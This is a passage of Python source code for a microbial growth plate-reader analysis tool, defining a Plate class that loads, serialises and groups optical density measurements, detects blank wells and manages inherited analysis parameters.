def __init__(self,filename=None,fileformat=None,
time=None,rawOds=None,
sampleIds=None,conditions=None,wellids=None,plateId=None):
"""
Constructor.
If filename is not None and fileformat is None some heuristics
are used to identify the file format.
:param filename: name of serialised Plate or ascii file exported by the plate reader.
:type filename: str
:param fileformat: string indicating the format ('gat', 'tecan')
:type fileformat: str
:param time: array of timepoints when optical density was measured
:type time: numpy.array(float)
:param rawOds: list of optical density arrays
:type rawOds: list( numpy.array(float) )
:param sampleIds: list of sample names corresponding to the array of optical densities
:type sampleIds: list(str)
:param conditions: list of conditions under which the samples where grown
:type conditions: list(str)
:param plateId: name of this plate
:type plateId: str
"""
self.plateId=None
self._rawOd=None
self.wells=None
self.time=None
self.temperature=None
self.timeunit=None
self._inheritableParameters={}
# default parameters
self._inheritableParameters['maxGrowthLowerTimeCutoff']=None
self._inheritableParameters['maxGrowthUpperTimeCutoff']=None
self._inheritableParameters['allowMaxGrowthrateAtLowerCutoff']=False
self._inheritableParameters['allowGrowthyieldSlopeNStderrAwayFromZero']=1
# pure plate parameters
self._inheritableParameters['logOdCutoff']=None
self._inheritableParameters['lagAtLogOdEquals']=-5
self._inheritableParameters['slidingWindowSize']=10
self._inheritableParameters['hdCorrectionLinear']=None
self._inheritableParameters['hdCorrectionQuadratic']=None
self._inheritableParameters['hdCorrectionCubic']=None
self._inheritableParameters['smoothingK']=5
self._inheritableParameters['smoothingS']=0.01
self._loadStatus=StatusMessage()
self._capitaliseBackgroundIds=['blank','background']
self._clearMetadata()
if filename is not None:
if not os.path.exists(filename):
raise IOError("No such file or directory: '"+filename+"'")
if fileformat is None:
if filename.endswith('.gat'):
fileformat='gat'
else:
scorefileformat=[]
for fileformat in Plate._parser2module:
score=Plate._parser2module[fileformat].isPlateFormat(filename)
if score > 0.:
scorefileformat.append({'score': score, 'fileformat': fileformat})
scorefileformat = sorted(scorefileformat, key=lambda k: k['score'],reverse=True)
if not len(scorefileformat):
raise Plate.UnknownFileFormat(filename,detailedError='Cannot determine file format')
fileformat=scorefileformat[0]['fileformat']
if fileformat == 'gat':
self._load(filename)
elif fileformat in Plate._parser2module:
time, rawOd, sampleIds, conditions, plateId, temperature, wellids=Plate._parser2module[fileformat].parse(filename)
self._initFromArrays(time,rawOd,sampleIds,conditions,plateId=plateId,temperature=temperature,wellids=wellids)
else:
raise Plate.UnknownFileFormat(filename,serFormat=fileformat)
self.readfileformat=fileformat
elif rawOds is not None:
self._initFromArrays(time,rawOds,sampleIds,conditions,plateId=plateId,wellids=wellids)
else:
raise RuntimeError('could not construct Plate, neither filename nor arrays given')
self.modified=False
def _clearReplicateGroups(self):
if hasattr(self,'replicateGroups'):
for tc in self.replicateGroups:
# NOTE invalidating here so code holding references to these fails
tc._invalidate()
self.replicateGroups=None
self._backgroundGroupIndices=None
self._sampleConditionToReplicateGroupIdcs=None # an associative array mapping replicate groups by sample ID to a list of Replicate object indices
self._conditionToReplicateGroupIdx=None # an associative array mapping condition to a list of replicate group object indices
def _clearMetadata(self):
self._clearReplicateGroups()
self._setBackgroundForAllReplicates(None)
self._conditionToWellIdx=None # an associative array mapping condition to a list of Replicate objects
self._sampleConditionToWellIdcs=None # an associative array mapping wells (sample IDs) to a list of Replicate object indices
def _load(self,filename):
with bz2.BZ2File(filename, 'r') as rfile:
pickled=rfile.read().decode("utf-8")
try:
unpickled = json.loads(pickled)
except ValueError as err:
raise Plate.UnknownFileFormat(filename,detailedError=str(err))
return self._deserialise(unpickled,filename)
def _deserialise(self,unpickled,filename):
if 'format' not in unpickled:
raise Plate.UnknownFileFormat(filename,detailedError='no "format" keyword found in file')
serFormatVersion=unpickled['formatversion'] if 'formatversion' in unpickled else 'undefined'
if unpickled['format'] != 'opticaldensityplate' or serFormatVersion != '1':
raise Plate.UnknownFileFormat(filename,serFormat=unpickled['format'],serFormatVersion=serFormatVersion)
parkeys=[
# default parameters
'maxGrowthLowerTimeCutoff',
'maxGrowthUpperTimeCutoff',
'allowMaxGrowthrateAtLowerCutoff',
'allowGrowthyieldSlopeNStderrAwayFromZero',
# pure plate parameters
'logOdCutoff',
'lagAtLogOdEquals',
'slidingWindowSize',
'hdCorrectionLinear',
'hdCorrectionQuadratic',
'hdCorrectionCubic',
'smoothingK',
'smoothingS'
]
# reset these to make sure defaults given to constructor are not used for serialised plate
for par in self._inheritableParameters:
self._inheritableParameters[par]=None
self.plateId=unpickled['plateId']
self.time=numpy.array(unpickled['time'],dtype=float)
self.timeunit=unpickled['timeunit']
# defaut parameters, some of which can be overridden by the individual replicates
for par in parkeys:
self._inheritableParameters[par]=unpickled[par]
if 'temperature' in unpickled:
self.temperature=numpy.array(unpickled['temperature'],dtype=float)
self._rawOd=[]
for lst in unpickled['rawOd']:
self._rawOd.append(numpy.array(lst,dtype=float))
self.wells=[]
for tcup in unpickled['wells']:
self.wells.append(Replicate(_unpickled=tcup,parentPlate=self,_serialiseFormat=unpickled['format']))
self.replicateGroups=[]
for tcup in unpickled['replicateGroup']:
comptc=Replicate(_unpickled=tcup,parentPlate=self,_serialiseFormat=unpickled['format'],isReplicateGroup=True)
self.replicateGroups.append(comptc)
# set parental replicate group of the children
for childtc in comptc.childWells():
childtc._setReplicateGroupParent(comptc)
# deferred to here: set the background index
for tc in self.wells:
if tc._tmp_backgroundIndex is not None:
tc._setBackgroundIndex(tc._tmp_backgroundIndex)
for tc in self.replicateGroups:
if tc._tmp_backgroundIndex is not None:
tc._setBackgroundIndex(tc._tmp_backgroundIndex)
# reset background indices, as these have been initialised
# before setting the replicate's backgrounds
self._backgroundWellIndices=None
self._backgroundGroupIndices=None
self._setBackgroundStatus()
def _serialise(self):
"""
Generates a dictionary of the plate data and parameters.
For internal use only.
"""
parkeys=[
# default parameters
'maxGrowthLowerTimeCutoff',
'maxGrowthUpperTimeCutoff',
'allowMaxGrowthrateAtLowerCutoff',
'allowGrowthyieldSlopeNStderrAwayFromZero',
# pure plate parameters
'logOdCutoff',
'lagAtLogOdEquals',
'slidingWindowSize',
'hdCorrectionLinear',
'hdCorrectionQuadratic',
'hdCorrectionCubic',
'smoothingK',
'smoothingS'
]
sr=dict()
sr["format"]='opticaldensityplate'
sr["formatversion"]='1' # this is an unsigned integer
sr['plateId']=self.plateId
sr['time']=self.time.tolist()
sr['timeunit']=self.timeunit
for key in parkeys:
sr[key]=self._inheritableParameters[key]
if self.temperature is not None:
sr['temperature']=self.temperature.tolist()
sr['rawOd']=[]
for raw in self._rawOd:
sr['rawOd'].append(raw.tolist())
sr['wells']=[]
for tc in self.wells:
sr['wells'].append(tc._serialise())
sr['replicateGroup']=[]
for tc in self.replicateGroups:
sr['replicateGroup'].append(tc._serialise())
return sr
def save(self,filename):
"""
Saves the plate content in a file.
:param filename: Name of the file.
:type filename: str
:return: StatusMessage/None -- non-fatal notifications.
"""
status=None
if not filename.endswith('.gat'):
root, ext = os.path.splitext(filename)
status=StatusMessage(
key='Saving file',shortmsg='wrongExtension',
longmsg=('GATHODE uses a file extension that is different from"'+ext+'". '
+'This means that a future version of this program will not be able to open this file with the graphical user interface. '
+'Please make save the file with the ".gat" extension.'),
severity=Severity.warning)
sr=self._serialise()
pickled = json.dumps(sr)
with bz2.BZ2File(filename, 'w') as wfile:
wfile.write(pickled.encode('utf-8'))
self.modified=False
return status
def _explicitlySetParsInChildWells(self,par):
"""
Explicitly set parameters in wells to their inherited values.
This can be used when replicate groups get removed
(e.g. setting new metadata) but the parameters should be
preserved. You most likely want to call
_reduceExplicitParameter once new replicate groups have been
created.
For internal use only.
"""
for tc in self.replicateGroups:
for child in tc.childWells():
# copy parameters from replicate group to the child
child._setExplicitParameter(par,child.getParameter(par))
def _reduceExplicitParameter(self,par):
"""
Sets the parameter par of self and wells such that it is shared by most of its children.
For internal use only.
:param par: the parameter for which a smaller set of values is created
:type par: string
"""
# check what could be the plate default for this parameter
parvals=Plate._getChildParvalOccurrence(self,par)
platedefault=Plate._chooseDefaultFromOccurrences(parvals)
# set parameters in replicate groups; if one of a groups's children has the same value
# as the platedefault use that one, otherwise try find another value for the group
for tc in self.replicateGroups:
Plate._reduceExplicitParametersHelper(tc,par,platedefault)
# now set the plate default (important: this has to be done *after* the Replicates are changed!)
Plate._reduceExplicitParametersHelper(self,par,platedefault)
return platedefault
@staticmethod
def _reduceExplicitParametersHelper(obj,par,parentdefault):
"""
Helper function for _reduceExplicitParameter
For internal use only.
:param obj: the parameter for that a smaller set of values is created
:type obj: Plate/Replicates
:param par: the parameter for that a smaller set of values is created
:type par: string
Will be called with plate and Replicate objects.
"""
# gather occurrence of each value for this parameter in children
parvals=Plate._getChildParvalOccurrence(obj,par)
# the value that occurs most often will become the replicate group's value
newdefaultval=Plate._chooseDefaultFromOccurrences(parvals,parentdefault)
# only if none of the children got value None we can copy values up
if newdefaultval is None:
return
# delete consensus value from children
for child in Plate._getChildren(obj):
if newdefaultval == child.getParameter(par):
child._setExplicitParameter(par,None)
# set consensus value for replicate group parent
obj._setExplicitParameter(par,newdefaultval)
@staticmethod
def _getChildParvalOccurrence(obj,par):
"""
Return count of parameter values of all leaf children (at the lowest level of the hierarchy).
For internal use only.
:return: dict -- { value1: countValue1, value2: countValue2, ...}
"""
if isinstance(obj, Replicate) and not obj.isReplicateGroup():
# this is a single well
val=obj.getParameter(par)
return {val: 1}
else:
parvals={}
for child in Plate._getChildren(obj):
childparvals=Plate._getChildParvalOccurrence(child,par)
# assemble childrens' results into the main dictionary
for val in childparvals:
if val not in parvals:
parvals[val]=0
parvals[val]+=childparvals[val]
return parvals
@staticmethod
def _chooseDefaultFromOccurrences(parvals,parentdefault=None):
"""
Return the value of a parameter that occurs most often in leaf children.
For internal use only.
Can be called both without parentdefault (for the whole plate)
and with parentdefault (for ReplicateGroups).
:param parvals: output from _getChildParvalOccurrence
:type parvals: dict
:return: float -- the most occuring parameter value for this plate or ReplicateGroup
"""
if None in parvals:
return None
maxcnt=0
maxval=None
parvalkeys=list(parvals.keys())
parvalkeys.sort()
for val in parvalkeys:
# if there is a value corresponding to the plate default choose that one
if parentdefault is not None and val == parentdefault:
return parentdefault
# choose maximal occurring as default
if parvals[val] > maxcnt:
maxval=val
maxcnt=parvals[val]
return maxval
@staticmethod
def _getChildren(obj):
if isinstance(obj, Plate):
# this is a plate
return obj.replicateGroups
else:
# this is a replicate group
return obj.childWells()
@staticmethod
def capitaliseId(sampleId,capitaliseThese):
"""
Capitalise id if in given list.
:param sampleId: sample id; if this matches capitaliseThese it will be capitalised
:type sampleId: str
:param capitaliseThese: list of sample ids that correspond to samples that should be capitalised
:type capitaliseThese: list(str)
:return: str -- sample id (capitalised if it matches one of capitaliseThese)
"""
for bgid in capitaliseThese:
if sampleId.upper() == bgid.upper():
return bgid.upper()
return sampleId
def _initFromArrays(self,time,rawOd,sampleIds,conditions,plateId=None,temperature=None,wellids=None):
"""
Initialises a plate from numpy arrays.
For internal use only.
:param time: array of timepoints when optical density was measured
:type time: numpy.array(float)
:param rawOd: list of optical density arrays
:type rawOd: list( numpy.array(float) )
:param sampleIds: list of sample names corresponding to the array of optical densities
:type sampleIds: list(str)
:param conditions: list of conditions under which the samples where grown
:type conditions: list(str)
:param plateId: name of this plate
:type plateId: str
:param temperature: array of the temperature
:type time: numpy.array(float)
:param wellids: array of ids for the wells (e.g. A1 to P24)
:type wellids: list(str)
"""
if len(rawOd) != len(sampleIds):
raise RuntimeError('number of raw optical density arrays is different from number of sample ids')
if len(sampleIds) != len(conditions):
raise RuntimeError('number of sample ids is different from number of conditions')
if wellids is not None and len(wellids) != len(set(wellids)):
raise RuntimeError('ids in wellids are not unique')
self.plateId=plateId
self.time=time/3600.
self.timeunit="h"
self._rawOd=rawOd
# make sure that background is correctly identified even if case is different
newSampleIds=[]
for sampleid in sampleIds:
newSampleIds.append(Plate.capitaliseId(sampleid,self._capitaliseBackgroundIds))
# create replicate objects for single wells from data (NOTE ids may exist multiple times, therefore this is not an associative array)
self.wells=[]
tcidx=0
for sampleid in newSampleIds:
wellid = [wellids[tcidx]] if wellids is not None else None
self.wells.append(Replicate(self,[tcidx],sampleid,conditions[tcidx],wellid))
# NOTE that on purpose this index is only increased for samples (not for time, temperature, ...)
tcidx+=1
self._createReplicateGroupsFromSampleIdsNConditions()
# use guessed background sampleIds to set background of single well and replicate groups
self._setBackgroundForAllReplicates(self._guessBackgroundSampleIds())
def wellMetadataOk(self,metadata):
"""
Check that the given metadata (i.e. sample id, growth condition) is valid and can be applied.
This basically checks that there is the right amount of
metadata entries and these contain sample ids and conditions.
:param metadata: array of metadata dictionaries
:type metadata: list(dict)
:return: bool, StatusMessage -- True if ok, False otherwise (and a StatusMessage with details)
"""
if len(metadata) != len(self.wells):
return False, StatusMessage(
key='Wrong metadata length:',shortmsg='metadata:wrongLength',
longmsg=('Number of metadata entries ('+str(len(metadata))+
') is different from number of wells '+str(len(self.wells))),
severity=Severity.failed)
idx=0
for metdat in metadata:
idx+=1
if len(metdat.keys()) != 2 or 'sample' not in metdat or 'condition' not in metdat:
thekeys='"'+('" "'.join(sorted(metdat.keys())))+'"' if len(metdat.keys()) else 'nothing'
return False, StatusMessage(
key='Wrong metadata elements:',shortmsg='metadata:wrongLength',
longmsg=('metadata for entry '+str(idx)+' contains '+thekeys+
', but should contain "condition" and "sample"'),
severity=Severity.failed)
return True, StatusMessage()
def setWellMetadata(self,metadata):
"""
Set the metadata (e.g. sample id, growth condition) of the wells.
:param metadata: array of metadata dictionaries
:type metadata: list(dict)
"""
metok, message = self.wellMetadataOk(metadata)
if not metok:
raise Plate.BadMetadata(str(message))
# propagate parameters to the wells before deleting replicate groups
for par in self.wells[0]._inheritableParameters.keys():
self._explicitlySetParsInChildWells(par)
# clear everything that depends on metadata
self._clearMetadata()
# set metadata of the wells
wellit=self.wells.__iter__()
for metdat in metadata:
metdat['sample']=Plate.capitaliseId(metdat['sample'],self._capitaliseBackgroundIds)
well=next(wellit)
well._setMetadata(metdat)
# create replicate groups based on sample ids and conditions
self._createReplicateGroupsFromSampleIdsNConditions()
# use guessed background sampleIds to set background of single well and replicate groups
self._setBackgroundForAllReplicates(self._guessBackgroundSampleIds())
# propagate parameters from the wells to the replicate groups (or plate) if possible
for par in self.wells[0]._inheritableParameters.keys():
self._reduceExplicitParameter(par)
def wellMetadata(self):
"""
Return the metadata of the wells.
:return: list(dict) -- metadata
"""
metadata=[]
for well in self.wells:
metadata.append(well._getMetadata())
return metadata
def _setupBackgroundIndices(self):
"""
Set self._backgroundGroupIndices and self._backgroundWellIndices.
Records the indices of tc.background (which are rpelicate
groups) for all wells and replicateGroups and also the indices
of the underlying background wells.
For internal use only.
"""
self._backgroundGroupIndices=set()
self._backgroundWellIndices=set()
if self.wells:
for tc in self.wells:
if tc.background:
self._backgroundGroupIndices.add(self._indexOfReplicateGroup(tc.background))
if self.replicateGroups:
for tc in self.replicateGroups:
if tc.background:
self._backgroundGroupIndices.add(self._indexOfReplicateGroup(tc.background))
for idx in self._backgroundGroupIndices:
for chldidx in self.replicateGroups[idx].childWellIndices():
self._backgroundWellIndices.add(chldidx)
def _guessBackgroundSampleIds(self):
"""
Guess sample ids of background wells ("BLANK" or "BACKGROUND")
For internal use only.
"""
backgroundKeys={}
for tc in self.wells:
if tc.sampleid == "BLANK" or tc.sampleid == "BACKGROUND":
backgroundKeys[tc.sampleid]=1
backgroundSampleIds=sorted(list(backgroundKeys.keys()))
return backgroundSampleIds
def _setBackgroundStatus(self):
"""
Add conditions/samples for which no background was found to self._loadStatus
This should be called when the background was set for some wells/replicate groups.
For internal use only.
"""
self._loadStatus.removeStatusesWithKey('No background samples:')
self._loadStatus.removeStatusesWithKey('No background for some samples:')
backgroundSampleIds=set()
for idx in self.backgroundReplicateGroupIndices():
backgroundSampleIds.add(self.replicateGroups[idx].sampleid)
for idx in self.backgroundWellIndices():
backgroundSampleIds.add(self.wells[idx].sampleid)
if len(backgroundSampleIds) < 1:
self._loadStatus.addStatus(
StatusMessage(
key='No background samples:',shortmsg='plateinit:noBackground',
longmsg=('No background (blank) wells could be identified.'+
' This means no growth parameters will be extracted'),
severity=Severity.warning)
)
return
noBackground={}
for tc in self.nonBackgroundWells():
if tc.background is None:
if tc.condition not in noBackground:
noBackground[tc.condition]={}
if tc.sampleid not in noBackground[tc.condition]:
noBackground[tc.condition][tc.sampleid]=[]
noBackground[tc.condition][tc.sampleid].append(tc)
for tc in self.nonBackgroundReplicates():
if tc.background is None:
if tc.condition not in noBackground:
noBackground[tc.condition]={}
if tc.sampleid not in noBackground[tc.condition]:
noBackground[tc.condition][tc.sampleid]=[]
noBackground[tc.condition][tc.sampleid].append(tc)
if len(noBackground.keys()):
affected=''
for condition in sorted(noBackground):
if condition is None or condition == '':
affected+='no condition:'
else:
affected+=condition+':'
for sampleid in sorted(noBackground[condition]):
affected+=' '+sampleid
affected+='\n'
self._loadStatus.addStatus(
StatusMessage(
key='No background for some samples:',shortmsg='plateinit:noBackgroundForSomeSamples',
longmsg=('For some conditions no background (blank) could be identified.'+
' This means no growth parameters will be extracted. The affected samples are:\n'+
affected),
severity=Severity.warning)
)
def backgroundReplicateGroupIndices(self):
"""
Return indices into self.replicateGroups for replicate groups being listed as background.
:return: list(int) -- indices of background replicate groups
"""
if self._backgroundGroupIndices is None:
self._setupBackgroundIndices()
return self._backgroundGroupIndices
def backgroundReplicateGroups(self):
"""
Return replicate groups being listed as background.
:return: list(Replicate) -- replicate groups listed as background
"""
tcs=[]
for idx in self.backgroundReplicateGroupIndices():
tcs.append(self.replicateGroups[idx])
return tcs
def backgroundWellIndices(self):
"""
Return indices into self.wells for wells being listed as background.
:return: list(int) -- indices of background wells
"""
if self._backgroundWellIndices is None:
self._setupBackgroundIndices()
return self._backgroundWellIndices
def backgroundWells(self):
"""
Return wells being listed as background.
:return: list(Replicate) -- wells listed as background
"""
tcs=[]
for idx in self.backgroundWellIndices():
tcs.append(self.wells[idx])
return tcs
def _createSampleConditionToWellIndices(self):
"""
Create a mapping to quickly find single-well objects based on sample id and condition.
For internal use only.
"""
# gather sampleids and conditions
self._conditionToWellIdx={}
self._sampleConditionToWellIdcs={}
tcidx=0
for tc in self.wells:
# add well to the condition mapping
if tc.condition not in self._conditionToWellIdx:
self._conditionToWellIdx[tc.condition]=[]
self._conditionToWellIdx[tc.condition].append(tcidx)
# add well to the replicate mapping (sampleid and condition)
if tc.sampleid not in self._sampleConditionToWellIdcs:
self._sampleConditionToWellIdcs[tc.sampleid]={}
if tc.condition not in self._sampleConditionToWellIdcs[tc.sampleid]:
self._sampleConditionToWellIdcs[tc.sampleid][tc.condition]=[]
self._sampleConditionToWellIdcs[tc.sampleid][tc.condition].append(tcidx)
tcidx+=1
def _createReplicateGroupsFromSampleIdsNConditions(self):
"""
Create replicate groups by grouping wells of the same sample id and condition.
For internal use only.
"""
if self._sampleConditionToWellIdcs is None:
self._createSampleConditionToWellIndices()
sampleids=list(self._sampleConditionToWellIdcs.keys())
sampleids.sort()
self.replicateGroups=[]
for sampleid in sampleids:
conditions=list(self._sampleConditionToWellIdcs[sampleid].keys())
conditions.sort()
for condition in conditions:
comptc=Replicate(self,self._sampleConditionToWellIdcs[sampleid][condition],
None,condition,isReplicateGroup=True)
self.replicateGroups.append(comptc)
# set parental replicate group of the children
for childtc in comptc.childWells():
childtc._setReplicateGroupParent(comptc)
def _createSampleConditionToReplicateGroupIndices(self):
"""
Create a mapping to quickly find replicate groups based on sample id and condition.
For internal use only.
"""
self._sampleConditionToReplicateGroupIdcs={}
coidx=0
for tc in self.replicateGroups:
if tc.sampleid not in self._sampleConditionToReplicateGroupIdcs:
self._sampleConditionToReplicateGroupIdcs[tc.sampleid]={}
if tc.condition not in self._sampleConditionToReplicateGroupIdcs[tc.sampleid]:
self._sampleConditionToReplicateGroupIdcs[tc.sampleid][tc.condition]=[]
self._sampleConditionToReplicateGroupIdcs[tc.sampleid][tc.condition].append(coidx)
coidx+=1
def _createConditionToReplicateGroupIndices(self):
"""
Create a mapping to quickly find all replicate groups for a specific condition.
For internal use only.
"""
self._conditionToReplicateGroupIdx={}
coidx=0
for tc in self.replicateGroups:
# add replicate group to the condition mapping
if tc.condition not in self._conditionToReplicateGroupIdx:
self._conditionToReplicateGroupIdx[tc.condition]=[]
self._conditionToReplicateGroupIdx[tc.condition].append(coidx)
coidx+=1
def _setBackgroundForAllReplicates(self,backgroundSampleIds):
"""
Set background replicate group for single-wells and replicate groups.
Currently, if there are multiple background ids, an exception is raised.
For internal use only.
"""
self._backgroundWellIndices=None
self._backgroundGroupIndices=None
if backgroundSampleIds is None or not len(backgroundSampleIds):
if self.wells is not None:
for tc in self.wells:
tc._setBackgroundIndex(None)
if self.replicateGroups is not None:
for tc in self.replicateGroups:
tc._setBackgroundIndex(None)
self._setBackgroundStatus()
return
if len(backgroundSampleIds) > 1:
raise Plate.MultipleBackgroundIdsError(backgroundSampleIds)
backgroundSampleId=backgroundSampleIds[0]
if self._sampleConditionToReplicateGroupIdcs is None:
self._createSampleConditionToReplicateGroupIndices()
# set background index for the single (non-averaged) wells
for tc in self.wells:
if tc.sampleid not in backgroundSampleIds:
if tc.condition in self._sampleConditionToReplicateGroupIdcs[backgroundSampleId]:
# NOTE there should be only one element in self._sampleConditionToReplicateGroupIdcs[backgroundSampleId][tc.condition]
tc._setBackgroundIndex(self._sampleConditionToReplicateGroupIdcs[backgroundSampleId][tc.condition][0])
# set background for replicate groups
for tc in self.replicateGroups:
if tc.sampleid not in backgroundSampleIds:
if tc.condition in self._sampleConditionToReplicateGroupIdcs[backgroundSampleId]:
# NOTE there should be only one element in self._sampleConditionToReplicateGroupIdcs[backgroundSampleId][tc.condition]
tc._setBackgroundIndex(self._sampleConditionToReplicateGroupIdcs[backgroundSampleId][tc.condition][0])
# append warnings to self._loadStatus if for some replicates no background was set
self._setBackgroundStatus()
def replicateGroupIdxForSampleCondition(self,sampleid,condition):
"""
Return index of replicate group with the given sample Id and condition.
:param sampleid: Id of the sample.
:type sampleid: string
:param condition: Condition under which the sample was grown.
:type condition: string
:return: int -- Index (into self.replicateGroups) of Replicate with given id and condition.
"""
if self._sampleConditionToReplicateGroupIdcs is None:
self._createSampleConditionToReplicateGroupIndices()
if sampleid not in self._sampleConditionToReplicateGroupIdcs:
return None
if condition not in self._sampleConditionToReplicateGroupIdcs[sampleid]:
return None
if len(self._sampleConditionToReplicateGroupIdcs[sampleid][condition]) != 1:
raise RuntimeError('more than one replicate group for '+sampleid+' '+condition)
return self._sampleConditionToReplicateGroupIdcs[sampleid][condition][0]
def replicateGroupForSampleCondition(self,sampleid,condition):
"""
Return index of replicate group with the given sample Id and condition.
:param sampleid: Id of the sample.
:type sampleid: string
:param condition: Condition under which the sample was grown.
:type condition: string
:return: Replicate -- replicate group with given id and condition.
"""
idx=self.replicateGroupIdxForSampleCondition(sampleid,condition)
if idx is None:
return None
return self.replicateGroups[idx]
def replicateGroupIdcsForCondition(self,condition):
"""
Return a list of indices of replicate groups with the given condition.
:param condition: Condition under which the samples were grown.
:type condition: string
:return: list(int) -- Indices (into self.replicateGroups) of replicate groups with the given condition.
"""
if self._conditionToReplicateGroupIdx is None:
self._createConditionToReplicateGroupIndices()
if condition not in self._conditionToReplicateGroupIdx:
return None
return self._conditionToReplicateGroupIdx[condition]
def replicateGroupsForCondition(self,condition):
"""
Return a list of replicate groups with the given condition.
:param condition: Condition under which the samples were grown.
:type condition: string
:return: list(Replicate) -- Replicate groups with given condition.
"""
idcs=self.replicateGroupIdcsForCondition(condition)
if idcs is None:
return None
tcs=[]
for idx in idcs:
tcs.append(self.replicateGroups[idx])
return tcs
def conditions(self):
"""
Return a list of conditions.
:return: list(str) -- Conditions.
"""
if self._conditionToReplicateGroupIdx is None:
self._createConditionToReplicateGroupIndices()
conditions=list(self._conditionToReplicateGroupIdx.keys())
conditions.sort()
return conditions
def nonBackgroundReplicates(self):
"""
:return: list(Replicate) -- replicate groups that are not background samples.
"""
backgroundIndices=self.backgroundReplicateGroupIndices()
nbckg=[]
idx=0
for tc in self.replicateGroups:
if idx not in backgroundIndices:
nbckg.append(tc)
idx+=1
return nbckg
def nonBackgroundReplicateIndices(self):
"""
:return: list(Replicate) -- Indices of replicate groups that are not background samples.
"""
backgroundIndices=self.backgroundReplicateGroupIndices()
nbckgidcs=[]
idx=0
for tc in self.replicateGroups:
if idx not in backgroundIndices:
nbckgidcs.append(idx)
idx+=1
return nbckgidcs
def nonBackgroundWells(self):
"""
:return: list(Replicate) -- wells that are not background samples.
"""
backgroundIndices=self.backgroundWellIndices()
nbckg=[]
idx=0
for tc in self.wells:
if idx not in backgroundIndices:
nbckg.append(tc)
idx+=1
return nbckg
def _indexOfReplicateGroup(self,ctc):
"""
Determine the index of the given replicate group.
For internal use only.
:return: int -- Index of replicate group.
"""
if self.replicateGroups is None:
return None
idx=0
idxOfTc=None
for ttc in self.replicateGroups:
if ttc._wellIndices == ctc._wellIndices:
if idxOfTc is not None:
raise RuntimeError("multiple similar replicate groups?")
else:
idxOfTc=idx
idx+=1
return idxOfTc
def _parametersUpdated(self,par=None):
"""
Notify replicate(s) that a parameter changed and memoised results should be deleted.
For internal use only.
:param par: The name of the parameter that was changed.
:type par: str
The Replicate objects memoise some results that are expensive
to calculate. When a parameter is updated, the results may not
be valid anymore and should get removed from the "cache".
If par is given, this method can decide which results should
be removed.
"""
# only needed for non-background replicate groups (as background does not depend on parameters)
for tc in self.nonBackgroundWells():
tc._parametersUpdated(par,dontRecurse=True)
for tc in self.nonBackgroundReplicates():
tc._parametersUpdated(par,dontRecurse=True)
self.modified=True
def _replicateChanged(self,tc,par=None):
"""
Update replicates that depend on the given replicate.
For internal use only.
"""
if self.replicateGroups is None:
# for startup code: there are no replicate groups yet
return
idxOfTc=self._indexOfReplicateGroup(tc)
if idxOfTc is None:
raise RuntimeError("no matching tc for "+tc.fullId())
for ptc in self.wells:
if ptc._backgroundIndex == idxOfTc:
ptc._parametersUpdated(par='backgroundRawOd')
for ctc in self.replicateGroups:
if ctc._backgroundIndex == idxOfTc:
ctc._parametersUpdated(par='backgroundRawOd')
def _getDefaultParameter(self,par):
"""
Get default value of parameter.
For internal use only.
:param par: The name of the parameter.
:type par: str
The Plate stores values of plate-wide parameters
and default parameters.
"""
if par not in self._inheritableParameters:
raise RuntimeError('_getDefaultParameter: unknown parameter '+par)
return self._inheritableParameters[par]
def _getExplicitParameter(self,par):
"""
Get explicit value of parameter (alias for _getDefaultParameter).
For internal use only.
:param par: The name of the parameter.
:type par: str
"""
return self._getDefaultParameter(par)
def getParameter(self,par):
"""
Return the requested parameter.
:param par: The name of the parameter.
:type par: str
If the parameter is explicitly set for the plate, this value
returned. Otherwise return None.
See chapter :ref:`parameters <gat parameters>` for details of
parameter handling and available parameters.
"""
return self._getDefaultParameter(par)
def parameterIsEditible(self,par):
"""
Return True if this is a parameter can have a plate-wide default.
:return: bool -- True if parameter can be edited.
Some parameters can only be changed per Replicate, some only
per Plate. This method is used to distinguish between them.
See chapter :ref:`parameters <gat parameters>` for details of
parameter handling and available parameters.
"""
if par in Plate._isNotPlateParameter and Plate._isNotPlateParameter[par]:
return False
if par not in self._inheritableParameters:
raise RuntimeError("parameterIsEditible: unknown parameter "+par)
return True
def parameterIsExplicitlySet(self,par):
"""
Return True if this is parameter is explicitly set.
:param par: The name of the parameter.
:type par: str
:return: bool -- True if parameter is explicitly set.
If a parameter is explicitly set for a replicate it overrides
an inherited value. This method is used to tell whether this
is the case. Since this object is a plate it tells whether a
default value has been set.
See chapter :ref:`parameters <gat parameters>` for details of
parameter handling and available parameters.
"""
return self._getExplicitParameter(par) is not None
def activeChildReplicatesHaveExplicitParameter(self,par):
"""
Return True if for at least one of the replicate groups the given parameter is explicitly set.
:param par: The name of the parameter.
:type par: str
:return: bool -- True if parameter is explicitly set in one of the replicate groups.
See chapter :ref:`parameters <gat parameters>` for details of
parameter handling and available parameters.
"""
for childtc in self.nonBackgroundReplicates():
if childtc._getExplicitParameter(par) is not None:
return True
if childtc.activeChildReplicatesHaveExplicitParameter(par):
return True
return False
def _setDefaultParameter(self,par,val):
"""
Change the (default) value of the given parameter.
For internal use only.
:param par: The name of the parameter that will be changed.
:type par: str
:param val: The new value.
"""
if par not in self._inheritableParameters:
raise RuntimeError('_setDefaultParameter: unknown parameter '+par)
self._inheritableParameters[par]=val
self._parametersUpdated(par)
def _setExplicitParameter(self,par,val):
"""
Change the value of the given parameter (alias for _setDefaultParameter).
For internal use only.
:param par: The name of the parameter that will be changed.
:type par: str
:param val: The new value.
"""
self._setDefaultParameter(par,val)
def setMaxGrowthLowerTimeCutoff(self,t):
"""Set lower limit of interval in which the maximal growth should be searched."""
self._setDefaultParameter('maxGrowthLowerTimeCutoff',t)
def setMaxGrowthUpperTimeCutoff(self,t):
"""Set upper limit of interval in which the maximal growth should be searched."""
self._setDefaultParameter('maxGrowthUpperTimeCutoff',t)
def setLogOdCutoff(self,lod):
"""Set cutoff value of log(OD)."""
self._setDefaultParameter('logOdCutoff',lod)
def setLagAtLogOdEquals(self,lagat):
"""Set value of log(OD) used to define the lag time."""
self._setDefaultParameter('lagAtLogOdEquals',lagat)
def setHighDensityCorrectionLinear(self,hdCorrectionLinear=None):
"""Set coefficient of linear term of high density correction."""
self._setDefaultParameter('hdCorrectionLinear',hdCorrectionLinear)
def setHighDensityCorrectionQuadratic(self,hdCorrectionQuadratic=None):
"""Set coefficient of quadratic term of high density correction."""
self._setDefaultParameter('hdCorrectionQuadratic',hdCorrectionQuadratic)
def setHighDensityCorrectionCubic(self,hdCorrectionCubic=None):
"""Set coefficient of cubic term of high density correction."""
self._setDefaultParameter('hdCorrectionCubic',hdCorrectionCubic)
def setSmoothingK(self,k):
"""Set degree of the smoothing spline."""
